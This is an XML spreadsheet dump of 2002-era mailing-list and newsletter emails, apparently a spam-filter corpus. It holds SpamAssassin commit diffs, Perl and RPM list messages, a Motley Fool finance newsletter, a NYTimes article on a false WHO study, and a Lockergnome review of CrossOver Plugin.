+ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));    # Now check  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));  ok_all_patterns();    %patterns = %is_spam_patterns; -sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb); +ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));  ok_all_patterns();   ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 02 Oct 2002 06:19:30 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 06:19:30 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin spamassassin.raw,1.68.2.12,1.68.2.13</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin\nIn directory usw-pr-cvs1:/tmp/cvs-serv4019\n\nModified Files:\n      Tag: b2_4_0\n	spamassassin.raw \nLog Message:\nfixed bug 1033: -R and -W were not respecting auto_whitelist_path\n\nIndex: spamassassin.raw\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v\nretrieving revision 1.68.2.12\nretrieving revision 1.68.2.13\ndiff -b -w -u -d -r1.68.2.12 -r1.68.2.13\n--- spamassassin.raw	24 Sep 2002 18:51:37 -0000	1.68.2.12\n+++ spamassassin.raw	2 Oct 2002 13:19:28 -0000	1.68.2.13\n@@ -216,6 +216,9 @@\n   if ($@) { warn $@; }\n \n   if ($doing_whitelist_operation) {\n+    # read the config!\n+    $spamtest-&gt;init (1);\n+\n     if ($opt{'add-to-whitelist'}) {\n       $spamtest-&gt;add_all_addresses_to_whitelist ($mail);\n     } elsif ($opt{'remove-from-whitelist'}) {\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/lib/Mail SpamAssassin.pm,1.115.2.11,1.115.2.12</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail In directory usw-pr-cvs1:/tmp/cvs-serv4019/lib/Mail Modified Files:       Tag: b2_4_0 	SpamAssassin.pm  Log Message: fixed bug 1033: -R and -W were not respecting auto_whitelist_path Index: SpamAssassin.pm =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin.pm,v retrieving revision 1.115.2.11 retrieving revision 1.115.2.12 diff -b -w -u -d -r1.115.2.11 -r1.115.2.12 --- SpamAssassin.pm	24 Sep 2002 18:51:37 -0000	1.115.2.11 +++ SpamAssassin.pm	2 Oct 2002 13:19:28 -0000	1.115.2.12 @@ -696,7 +696,13 @@  }    ########################################################################### -# non-public methods. + +=item $f-&gt;init ($use_user_prefs) + +Read and parse the current configuration. C&lt;$use_user_prefs&gt; can +be C&lt;0&gt; (do not read user preferences) or C&lt;1&gt; (do). + +=cut    sub init {    my ($self, $use_user_pref) = @_; @@ -767,6 +773,9 @@      # TODO -- open DNS cache etc. if necessary  } + +########################################################################### +# non-public methods.    sub read_cf {    my ($self, $path, $desc) = @_; ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 02 Oct 2002 02:00:38 +0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 02:00:38 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-02</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Announcing SouthFlorida.pm\n\n+--------------------------------------------------------------------+\n| Announcing SouthFlorida.pm                                         |\n|   posted by ziggy on Tuesday October 01, @10:50 (groups)           |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]jbisbee writes "The South Florida Perl Mongers group is announcing its\nfirst social meeting to be held at [1]The Duck Tavern in Boca Raton, FL\non Tuesday, October 15 at 7:30 PM. Please keep an eye on\n[2]southflorida.pm.org for updated news and events concerning\nsouthflorida.pm."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.jbisbee.com[/URL]\n    1. [URL]http://yp.yahoo.com[/URL]\n    2. [URL]http://southflorida.pm.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jbisbee.com http://yp.yahoo.com http://southflorida.pm.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 02 Oct 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-10-02</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nAnnouncing SouthFlorida.pm\n    posted by ziggy on Tuesday October 01, @10:50 (group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rpm-zzzlist@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Wed, 02 Oct 2002 01:51:32 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 01:51:32 -0700</t>
  </si>
  <si>
    <t>Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;</t>
  </si>
  <si>
    <t>Matthias Saou wrote: &gt; Well, I don't really find it consistent at all to use an rpm package &gt; built against something that wasn't installed through rpm :-/ Oh well.  Fair enough. &gt; What I'd recommend in your case [...] Ugh, way too much manual labor.  :-) What I've done instead is to create a tiny little "kernel.spec" that installs no files but claims to produce a kernel package having version number `uname -r` for architecture `uname -p`.  It also claims to provide kernel-sources at the same version.  That is enough to make alsa-driver.spec happy, and at least forms a reasonable representation of what my homemade kernel provides to the system.  I should have thought of this approach sooner. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ben Liblit &lt;liblit@eecs.berkeley.edu&gt;\nDate: Wed, 02 Oct 2002 00:54:56 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 00:54:56 -0700</t>
  </si>
  <si>
    <t>alsa-driver.spec tweak for homemade kernels</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA) Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT I use a mostly Red Hat 8.0 system, but prefer to configure and build my  kernel by hand.  I'd like to humbly offer a tweak to alsa-driver.spec  that helps it build cleanly under such circumstances.  I recognize that  freshrpms.net packages are designed with standard Red Hat in mind,  including a standard kernel RPM.  However, I hope that Matthias will  consider the tweak small enough to justify its incorporation. The diff is attached below.  The first part of the diff contains a  conditional that checks to see if the expected RPM is installed.  If it  is, %{karch} is set as before and a new %{krpm} flag is set to 1.  If  the expected RPM is not installed, then %{karch} is instead set using  "uname -p", while %{krpm} is left undefined. The second part of the diff is simpler.  We only require that  kernel-source be installed if the kernel itself came from an RPM.  (If  the kernel was hand-built, the presumably the user knows enough to have  retained the sources in the expected place.) Again, I realize that I'm operating "off warrantee" by not using a Red  Hat kernel RPM.  Matthias, if you think this tweak is reasonable and not  too ugly, I'd love to see you pick it up.  If not, well at least this  message will sit in the archives and may help other folks in the future. --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA) Content-type: video/mng; name=diffs Content-transfer-encoding: base64 Content-disposition: inline; filename=diffs LS0tIGFsc2EtZHJpdmVyLnNwZWMub3JpZwkyMDAyLTEwLTAxIDEzOjExOjQ0LjAwMDAwMDAw MCAtMDcwMAorKysgYWxzYS1kcml2ZXIuc3BlYwkyMDAyLTEwLTAyIDAwOjM4OjIyLjAwMDAw MDAwMCAtMDcwMApAQCAtOCw3ICs4LDEyIEBACiAlaWYgJSh1bmFtZSAtciB8IGdyZXAgLWMg c21wKQogCSV7ZXhwYW5kOiUlZGVmaW5lIGtzbXAgLXNtcH0KICVlbmRpZgotJWRlZmluZQlr YXJjaAkJJShycG0gLXEgLS1xZiAnJSV7YXJjaH0nIGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNp b259KQorJWlmICUocnBtIC1xIGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNpb259ID4vZGV2L251 bGw7IGVjaG8gJD8pCisJJWRlZmluZQlrYXJjaAkJJSh1bmFtZSAtcCkKKyVlbHNlCisJJWRl ZmluZSBrcnBtCQkxCisJJWRlZmluZQlrYXJjaAkJJShycG0gLXEgLS1xZiAnJSV7YXJjaH0n IGtlcm5lbCV7P2tzbXB9LSV7a3ZlcnNpb259KQorJWVuZGlmCiAlZGVmaW5lCWtyZWx2ZXIJ CSUoZWNobyAle2t2ZXJzaW9ufSB8IHRyIC1zICctJyAnXycpCiAKIFN1bW1hcnk6IFRoZSBB ZHZhbmNlZCBMaW51eCBTb3VuZCBBcmNoaXRlY3R1cmUgKEFMU0EpIGJhc2UgZmlsZXMuCkBA IC0yNSw3ICszMCw4IEBACiBCdWlsZFJvb3Q6ICV7X3RtcHBhdGh9LyV7bmFtZX0tJXt2ZXJz aW9ufS1yb290CiBCdWlsZEFyY2g6ICV7a2FyY2h9CiBSZXF1aXJlczogYWxzYS1rZXJuZWwg PSAle3ZlcnNpb259LCAvc2Jpbi9kZXBtb2QKLUJ1aWxkUmVxdWlyZXM6IGtlcm5lbC1zb3Vy Y2UgPSAle2t2ZXJzaW9ufSwgTUFLRURFVgorJXs/a3JwbTpCdWlsZFJlcXVpcmVzOiBrZXJu ZWwtc291cmNlID0gJXtrdmVyc2lvbn19CitCdWlsZFJlcXVpcmVzOiBNQUtFREVWCiAKICVk ZXNjcmlwdGlvbgogVGhlIEFkdmFuY2VkIExpbnV4IFNvdW5kIEFyY2hpdGVjdHVyZSAoQUxT QSkgcHJvdmlkZXMgYXVkaW8gYW5kIE1JREkK --Boundary_(ID_KtnWPrcWHTTzQa7OHxPjiA)-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: mkettler@home.com\nFrom: The Motley Fool &lt;Fool@motleyfool.com&gt;\nDate: Wed, 02 Jan 2002 13:55:00 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Jan 2002 13:55:00 -0500</t>
  </si>
  <si>
    <t>The Motley Fool &lt;Fool@motleyfool.com&gt;</t>
  </si>
  <si>
    <t>mkettler@home.com</t>
  </si>
  <si>
    <t>Personal Finance: Resolutions You Can Keep</t>
  </si>
  <si>
    <t>======================== THE MOTLEY FOOL ========================\n                        PERSONAL  FINANCE \n                    Wednesday, January 2, 2002 \n										 \nmkettler@home.com\n=================================================================\n\nIN THIS ISSUE\n\n- ASK THE FOOL: Stop the Solicitation!\n  [URL]http://www.fool.com[/URL]\n\n- YOUR MONEY: Resolutions You Can Keep\n  [URL]http://www.fool.com[/URL]\n\n- SPOTLIGHT: Should All My Savings Be in the Market?\n  [URL]http://www.fool.com[/URL]\n	\n- COMMUNITY TIPS: Do (At Least) One Thing Differently\n  [URL]http://www.fool.com[/URL]\n\n=================================================================\n\nSPONSORED BY: Datek\nDatek Online. Built to trade.\n*Proprietary auto routing technology | *$9.99 commission \nfor online equity trades | *60-second execution commitment.\nApply for a Datek Account Now!\n[URL]http://www.lnksrv.com[/URL]\n\n=================================================================\nASK THE FOOL\n\nQ. I'M TIRED OF GETTING SO MANY CREDIT CARD OFFERS IN THE MAIL. \nI ALREADY HAVE \nA CARD AND I DON'T WANT ANY MORE MAIL OFFERING ME NEW ONES. HOW \nCAN I STOP IT? \n\nA. There are three main credit bureaus in the United States, and \nthey've agreed that if someone contacts one of them and asks to \nbe removed from junk mail (er, "direct mail") lists and \ntelemarketing phone lists, they'll all honor the request. \n\nFull Answer:\n[URL]http://www.fool.com[/URL]\n\n-----------------------------------------------------------------\nYOUR MONEY \n\nRESOLUTIONS YOU CAN KEEP\nLet's face it, New Year's resolutions are mostly nightmares that \nhang over our heads like that dark cloud that follows Eeyore \neverywhere he goes. We mostly fail to keep our resolutions \nbecause they are too vague and imply guilt-inducing judgment. 1. \nLive every moment. 2. Be a good person. 3. Lose a lot of weight. \nNo pressure. Right? Wrong. \n[URL]http://www.lnksrv.com[/URL]\n\nDon't despair. We've put together a quick, proactive to-do list \nthat is actually doable. This year's resolution: Save big bucks \nnow and live comfortably in the future. Now that's a resolution \nyou can get behind. Let's get started! \n\n1. DIAL AWAY YOUR DEBT \nIt's true. You can lower your credit card interest rates with \none phone call.\n[URL]http://www.fool.com[/URL] \n\n2. GET MORE FROM YOUR SAVINGS\nDon't stash your short-term cash savings under your mattress. \nEarn higher yields on CDs, money markets, and more. \n[URL]http://www.fool.com[/URL]\n\n3. INVEST FOR LESS \nMake sure your broker isn't charging you too much. Compare rates \nand hire a new one in only 60 seconds. \n[URL]http://www.fool.com[/URL]\n\n4. RETIRE EARLY\nThanks to recent tax law changes, you can start pitching in more \nto your retirement accounts.\n[URL]http://www.fool.com[/URL]\n\n5. REFINANCE AND SAVE \nWhen interest rates drop, some homeowners have the opportunity \nto save big money.\n[URL]http://www.fool.com[/URL]\n\nIf this list seems too daunting, and you don't want to go it \nalone, you can get some unbiased, professional advice about your \nfinances with TMF Money Advisor. In fact, we're so excited about \nthis service, we are offering a free one-month trial \nsubscription. For more information, go here. \n[URL]http://www.fool.com[/URL]\n\nFor more money-saving tips to aid your journey to Financial \nIndependence, visit our Personal Finance area. \n[URL]http://www.fool.com[/URL]\n\n-----------------------------------------------------------------\nSPOTLIGHT\n\nSHOULD ALL MY SAVINGS BE IN THE MARKET?\nUm, no. \n\nWe are big supporters of the idea that all of your long-term \nmoney should be in the stock market. But over the short term, \nthe market is too volatile. Buying stocks for short-term gain is \nreally speculating, not investing. Would you have wanted to have \nyour emergency fund, or your house down payment, or your kid's \ntuition in the Nasdaq at its height on March 10, 2000? If you \ncan't afford or wait out a 30% drop in the value of your \nsavings, keep it out of the market.\n\nOf course, we're not just going to leave you hanging. To figure \nout the best place to keep your short-term savings, visit our \nnifty Savings Center. \n[URL]http://www.fool.com[/URL]\n\n-----------------------------------------------------------------\nCOMMUNITY TIPS\n\nDO (AT LEAST) ONE THING DIFFERENTLY\nFolks on the Living Below Your Means discussion board have been \nsharing at least one thing they are going to do differently in \n2002 to save money. \n\n-I am going to make sure I carry my coupon envelope in my purse \n so I don't find myself at the grocery store buying a bunch of \n stuff on which I could save a bunch of money if I hadn't left my \n coupons at home. \n\n-Make sure I get reimbursed for every dime my company owes me. I \n have a bad habit of not filing expense reports for little stuff, \n like 10 miles of mileage to go to a mediation. Ten miles is \n $3.10 and if I do that 10 times a year, that's more than 30 \n bucks, and definitely worth filing an expense report for. \n\n-I'm going to make at least one crock-pot meal a week so I don't \n get tempted to go out and buy something to eat. Fridays would be \n a great time to do this. \n\n-Either cut down on the long-distance phone calls, or else find \n a cheaper long-distance plan.\n\n-Document everything that I give to charity, including the \n clothes and books, so that I can deduct it from my taxes. \n\n-Keep turning down the thermostat at night and when I leave the \n house. Run my humidifier (moist air is cheaper to heat). \n\nHave any tips of your own? Add to the growing list here.\n[URL]http://www.fool.com[/URL]\n\n=================================================================\n			\nSPONSORED BY: Datek\nDatek Online. Built to trade.\n*Proprietary auto routing technology | *$9.99 commission \nfor online equity trades | *60-second execution commitment.\nApply for a Datek Account Now!\n[URL]http://www.lnksrv.com[/URL]\n			\n=================================================================\n\nMy Portfolio: [URL]http://www.fool.com[/URL]\nMy Discussion Boards: [URL]http://www.fool.com[/URL]\n\n	 \nWANNA TAKE THE SHORTCUT?\nCheck out our new Crash Courses, the fastest way to get\nyour finances in order. Get results in less than an hour, for\njust $10. Try one today!\n[URL]http://www.fool.com[/URL]\n\nPERKS FOR FOOLS ONLY\nGet free stuff and special offers, just for you!\n[URL]http://www.fool.com[/URL]\n\nCUSTOMER SERVICE\nAsk our staff for help with email delivery problems.\n[URL]http://www.fool.com[/URL]\n \nUNSUBSCRIBE\nHere's how to unsubscribe or change your settings.\n[URL]http://www.fool.com[/URL]\n\n_____________________________________________________\nCopyright (c) 1995-2001 The Motley Fool. All rights reserved.\nLegal Information: [URL]http://www.fool.com[/URL]\n\n\n\nMsgId: msg-7678-2002-01-02_13-22-47-4816731_25_Plain_MessageAddress.msg-13:51:39(1-02-2002)\nX-Version: mailer-sender-master,v 1.84 \nX-Version: mailer-sender-daemon,v 1.84 \nMessage-Recipient: mkettler@home.com</t>
  </si>
  <si>
    <t>http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.lnksrv.com http://www.fool.com http://www.lnksrv.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.lnksrv.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com http://www.fool.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: khare@alumni.caltech.edu\nDate: Wed,  2 Oct 2002 18:51:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed,  2 Oct 2002 18:51:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>khare@alumni.caltech.edu</t>
  </si>
  <si>
    <t>NYTimes.com Article: Stop Those Presses! Blonds, It Seems, Will</t>
  </si>
  <si>
    <t>This article from NYTimes.com \nhas been sent to you by khare@alumni.caltech.edu.\n\n\nExcellent evidence of the herd. Just imagine if the anonymous noise injected into our world newsphere (noosphere?) was, say, a fraudulent story that a stock accounting scandal had been accused and the evildoers were shorting. \n\nOh, wait, that happened. An unemployed Orange County student took down Emulex...\n\nEnjoy!\n  Rohit\n\nkhare@alumni.caltech.edu\n\n\nStop Those Presses! Blonds, It Seems, Will Survive After All\n\nOctober 2, 2002\nBy LAWRENCE K. ALTMAN \n\n\n\n\n \n\nApparently it fell into the category "too good to check."\n\n\nLast Friday, several British newspapers reported that the\nWorld Health Organization had found in a study that blonds\nwould become extinct within 200 years, because blondness\nwas caused by a recessive gene that was dying out. The\nreports were repeated on Friday by anchors for the ABC News\nprogram "Good Morning America," and on Saturday by CNN. \n\nThere was only one problem, the health organization said in\na statement yesterday that it never reported that blonds\nwould become extinct, and it had never done a study on the\nsubject. \n\n"W.H.O. has no knowledge of how these news reports\noriginated," said the organization, an agency of the United\nNations based in Geneva, "but would like to stress that we\nhave no opinion of the future existence of blonds." \n\nAll the news reports, in Britain and the United States,\ncited a study from the World Health Organization - "a\nblonde-shell study," as The Daily Star of London put it.\nBut none reported any scientific details from the study or\nthe names of the scientists who conducted it. \n\nOn "Good Morning America," Charles Gibson began a\nconversation with his co-anchor, Diane Sawyer, by saying:\n"There's a study from the World Health Organization, this\nis for real, that blonds are an endangered species. Women\nand men with blond hair, eyebrows and blue eyes, natural\nblonds, they say will vanish from the face of the earth\nwithin 200 years, because it is not as strong a gene as\nbrunets." \n\nMs. Sawyer said she was "somewhat of a natural blonde."\n\n\nJeffrey Schneider, a spokesman for ABC News, said the\nanchors got the information from an ABC producer in London\nwho said he had read it in a British newspaper. \n\nIn London, The Sun and The Express both reported that\nunnamed scientists said blonds would survive longest in\nScandinavia, where they are most concentrated, and expected\nthe last true blond to hail from Finland. \n\nThe British accounts were replete with the views of\nbleached blonds who said hairdressers would never allow\nblondness to become extinct, and doctors who said that rare\ngenes would pop up to keep natural blonds from becoming an\nendangered species. \n\nJournalists in London said last night that the source of\nthe reports was probably one of several European news\nagencies that are used by the British press, but it\nremained unclear which one. \n\nTim Hall, a night news editor at The Daily Mail, said the\nreport was probably distributed by The Press Association,\nBritain's domestic news agency. "Several papers picked it\nup," he said. \n\nBut Charlotte Gapper, night editor at The Press\nAssociation, said that although it had considered running\nthe report on Sept. 27, it had decided not to after talking\nto the World Health Organization. \n\n"We didn't do that story because we made an inquiry to the\nWorld Health Organization first," she said. "They told us\nthat report was two years old, and had been covered at the\ntime. They said it had been picked up again that day by a\nGerman news agency." \n\nShe added that she did not know which agency the\norganization was referring to. \n\nDr. Ray White, a geneticist at the University of California\nat San Francisco, said that the disappearance of a gene for\nblond hair "sounds patently incorrect."\n\n[URL]http://www.nytimes.com[/URL]\n\n\n\nHOW TO ADVERTISE\n---------------------------------\nFor information on advertising in e-mail newsletters \nor other creative advertising opportunities with The \nNew York Times on the Web, please contact\nonlinesales@nytimes.com or visit our online media \nkit at [URL]http://www.nytimes.com[/URL]\n\nFor general information about NYTimes.com, write to \nhelp@nytimes.com.  \n\nCopyright 2002 The New York Times Company</t>
  </si>
  <si>
    <t>http://www.nytimes.com http://www.nytimes.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;\nDate: Tue, 9 Jul 2002 21:15:33 -0500</t>
  </si>
  <si>
    <t>Tue, 9 Jul 2002 21:15:33 -0500</t>
  </si>
  <si>
    <t>Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;</t>
  </si>
  <si>
    <t>[Lockergnome Penguin Shell]  Recursive Metaphor</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Linux\nCentral]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.09.2002 PenguinREPORT  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \nI don't usually spend much time explaining metaphors. They are, after all,\nmetaphorical. They can be filled with whatever symbolism you choose. Written\nwell, we all come to some similar understanding of their meaning. But, I'll\ndepart today, contrary to my normal practice, to take a few minutes explaining\na recent metaphor.\n\nI'm a Linux guy through and through. As a user, I see myself as right about at\nthe average on the curve. For love of the language and open source attitude,\nthough, you'd be hard-pressed to find anyone with quite the same level of\nenthusiasm. Put simply, there's very little about the Linux and broader open\nsource worlds that I don't like or believe in.\n\nTake, for example, the practice of recursive acronyms. GNU ("Gnu's Not Unix"),\nHURD ("Herd of Unix-Replacing Daemons"), WINE ("Wine Is Not an Emulator"),\neven PHP ("PHP Hypertext Processor") - all carry on the tradition of recursion\nin the Unix/Linux world. Goofy as it sounds, I love this stuff.\n\nSo it is that I set out to create a recursive metaphor last week. It could\nonly have happened on or about the 4th of July. In fact, it happened in the\nedition of the 3rd. I wrote a piece about how we Americans spend more time\nover the course of a year talking about what's _wrong_ with our system than\nwhat's right. I wrote it knowing full well that many of the responses I'd get\nwould be a) from readers outside the US and b) in sharp disagreement to my\ncomments or those of citizens of other countries. You're following me, right?\nPeople would disagree with an article that said we spend much time\ndisagreeing. This, of course, would prove my point in a somewhat metaphorical\nway - the perfect recursive metaphor. The point was to be made yet more\nperfectly by the eventual inclusion in Penguin Shell of the comments of\nsomeone from _outside_ the US disagreeing with my take our argumentativeness\nas Americans. Ideally, they would be comments that disagreed with our\ncollective American perception of being disagreeable. They would, of course,\npoint out things about which citizens of other countries can disagree with\nAmericans on. By exercising the right to disagree, we'd subtly agree that we\nhave that right. Yet another level of recursion and a final layer of metaphor.\n\nThe response to both my own and Johan Sauviller's comments was overwhelming.\nIn the main, I believe both were appreciated. Many commented on the balance of\nthe two pieces. Some readers were surprised, I think, to see a dissenting\nopinion published so quickly, if at all. Overall, the ability to express\nhonestly held opinions, to agree and to disagree on a global level closed the\ncircle on the metaphor in a perfect way.\n\nThings have, however, gotten a bit more ugly in the past few days. I'm not\nsure whether some were slow in getting to the July 3rd issue, or whether it's\njust been stewing since then. Take, for instance, these comments by a reader\nwho will remain mercifully nameless:\n\n&gt; We get enough America bashing from our left-wing whacko extremist press and\n&gt; schools here in the USA that we don't wish to hear some (insert favorite\n&gt; adjective here) from Belgium whining too!\n\nFollowed by:\n\n&gt; ... please don't let Tony single-handedly tarnish the fine reputation of\n&gt; Lockergnome. I'm sure there are other articulate Linux experts out there who\n&gt; would be able to replace him.\n\n... and, in a later note on the topic ...\n\n&gt; Censorship is to be encouraged in a free-market society whenever and\n&gt; wherever it doesn't come from the government.\n\nClearly, the metaphor just whizzed right over the heads of some.\n\nChris has been great about allowing all his authors plenty of room in the\neditorial piece at the beginning of each newsletter. This particular piece is\nno exception. He's shown a quiet confidence in the face of some very shrill\ncomments. While we all generally stay focused on technical issues, Chris has\nshown unwavering support for the notion that we geeks are, in the end, humans\nwith opinions and thoughts to share. I think it's one of the things that makes\nthe Lockergnome newsletters stand out from the pack - the personal touch.\n\nSo, despite the irrationality of some of this week's comments, I'll continue\nto occasionally throw in a personal aside with the technical stuff.\n\nJust watch out. Recursive metaphors are only funny until someone puts an eye\nout.\n\nTony Steidler-Dennison  \n\n  \n\n GnomeTWEAK  \n  \n---  \n  \n**Lockergnome readers, SAVE 50% on the Computing Encyclopedia!** Are you\nlooking for the ultimate computing resource? Discover the _Computing\nEncyclopedia_ from Smart Computing. Regular price $59, SPECIAL OFFER for\nLockergnome readers, get your set TODAY, ONLY $29.95!  \n---  \n  \n**Win Apps in Linux?**\n\nYesterday, I mentioned an interesting review of two products for Linux by\nCodeWeavers \- CrossOver Office and CrossOver Plugin. You've probably heard of\nboth by now, as they've garnered quite a bit of publicity both in and out of\nthe Linux world. You'll recall that I promised to try to secure copies for\nreview this week. With the help of a friendly sales rep at CodeWeavers, I was\nable to accomplish that task this morning. True to the second half of the\npromise, we'll spend the next few days looking at these two products and how\nthey might impact your Linux use. Let's take them in chronological order,\nstarting today with CrossOver Plugin.\n\nA bit of background is in order. CodeWeavers is, in their own words, " ... the\nleading corporate backer of the Wine Project. Wine has been, for the past\nseveral years, an ongoing project to port Windows applications to Linux. It's\na tough goal, but it's also one that's been undertaken by others in the past\nyear or so. Though the progress has been slow, the Wine project has managed to\nstay at the front of this development realm.\n\nCrossOver Plugin marks a change in the philosophy of the Wine Project. Prior\nto its release, Wine had taken a "full system" approach. Running Windows\napplications in Wine required the installation of a sizeable daemon and no\nsmall amount of configuration work. CrossOver Plugin has moved Wine away from\nthe system-wide approach to one that's much more modular. Rather than\nexecuting at system startup, Wine is called as-needed, with the virtual\nWindows path to the called program. When the program is closed, so is Wine.\nCrossOver Plugin has focused on creating Linux functionality with _one_\nrelated set of Windows applications: browser plugins.\n\nThe results stand as a clear indication that the change in philosophy is a\nsuccess. Off the top, CrossOver Plugin bundles QuickTime 5, Windows Media\nPlayer 6.2, Shockwave 8.5, Flash 6, and RealPlayer 8 into a Linux-accesible\nbrowser plugin package. Throw in more esoteric apps like IPix, Trillian,\nAuthorware Web Player 6 and eFax Messenger 2, and you've got virtually every\nneed plugin need covered.\n\nBut this package doesn't stop there. Included in the CrossOver Plugin package\nare viewers for Word, Excel and Powerpoint, as well as several Microsoft-\noriented fonts. Honestly, I was stunned at the range of applications offered\nby the CodeWeavers developers.\n\nHaving had some experience with Wine, I was a bit leery about the install\nprocess and about the ability to get all these great applications to work with\nmy RedHat setup. I've never been completely successful with Wine, but I hoped\nfor the best when I started the CrossOver Plugin installation. I really did\nwant these apps to work.\n\nThe installation was quite easy. By running the install-crossover.sh script\nfrom the command line, I was able to install the installers for both CrossOver\nPlugin and CrossOver Office, which we'll talk about tomorrow. I started the\nplugin installs with QuickTime, a tool I've admittedly missed in Linux. In the\nbackground, CrossOver Plugin had already created a virtual C:\ drive on my\nmachine. I clicked on the QuickTime install and immediately saw a familiar\nsight \- the Vise installer in its Windows format. CrossOver Plugin first\nchecked for feedback from the Windows binary, opened a virtual Windows window,\nthen stepped out while the Vise installer took care of the rest. Though the\ninstall failed four times, it appeared to be a server failure rather than a\nfailure of the CrossOver program. I kept "retry"ing and, with some\npersistence, managed to get a full QuickTime 5 install downloaded from the\nApple servers. Quite literally, the install looked and performed exactly as\nI've seem many times in Windows. When the install was completed, CrossOver\nagain checked for the Windows binary, located the appropriate .dll files in\nthe virtual C:\ drive and dropped the plugins into the\n/home/tony/.netscape/plugins and /home/tony/.mozilla/plugins directories.\n\nThe process was so smooth that I had to check the plugin listings in these\nbrowsers - "Help", "About Plugins." Sure enough, the CrossOver QuickTime\nplugin was listed. Quickly, I ran out to the Apple site and opened the "Men In\nBlack II" movie trailer. QuickTime performed flawlessly.\n\nI followed with the Windows Media Player, Shockwave, Flash, IPix, and eFax\nMessenger installs. Of those, the only ones that weren't self-contained in the\nCrossOver install were IPix and eFax. Even at that, the installer pointed me\nto the Windows download then found the .exe file when the download was done.\nWithin a half-hour, I had all installed and tested.\n\nThen, just for grins, I installed RealPlayer 8 via CrossOver. This was despite\nthe recommendation in the installer screen to use the Linux version. It went\nas smoothly as the others with one caveat - the player played media files at a\nmuch faster speed than that in Windows. Fast enough to make me laugh, in fact,\nreminded of Dave and Alvin the Chipmunk. Ah well, six out of seven is pretty\nstrong given my previous troubles with Wine.\n\nI also installed a few fonts - Arial, Times New Roman, Trebuchet, and Veranda.\nIn every case, the install was quick and absolutely painless.\n\nWine has always held great promise. At times, it's been painful to watch the\ntedious pace of development, only because that promise was so alluring. With\nthe backing of CodeWeavers and a fundamental change in the approach to\ndevelopment, Wine has finally realized the goal of integrating Windows\napplications seamlessly into the stable Linux environment. The results are 